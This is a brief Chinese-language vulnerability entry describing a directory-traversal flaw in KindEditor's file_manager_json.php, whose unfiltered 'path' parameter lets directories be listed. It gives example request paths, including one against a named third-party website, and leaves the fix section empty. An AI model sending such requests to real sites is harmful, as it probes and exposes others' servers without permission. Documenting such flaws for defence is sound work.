Kindeditor 编译器目录遍历

漏洞简述

kindeditor编辑器/php/file_manager_json.php?path=文件的path参数未过滤，造成可遍历目录。

漏洞实例

/styles/utab/template/kindeditor/php/demo.php
/styles/utab/template/kindeditor/php/file_manager_json.php?path=/

http://www.tck-tech.com/static/jscripts/kindeditor/php/file_manager_json.php?path=/

漏洞修复

PreviousPHP FastCGI 解析漏洞 Next支持不安全的TLSv1.0协议

Last updated 4 years ago